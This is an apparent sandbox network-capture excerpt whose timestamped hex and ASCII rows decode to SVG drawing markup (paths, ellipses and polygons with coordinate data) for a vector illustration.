                                                                                                                                                                                                                                                  Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1094INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                  Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1110INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1126INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1142INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                  Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1158INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                  Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1174INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                  Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1190INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                  Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1206INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                  Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1222INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                  Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1238INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                  Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1254INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1270INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1286INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1302INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                  Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1318INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                  Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1334INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                  Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                  2023-07-27 19:53:38 UTC1350INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                  Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
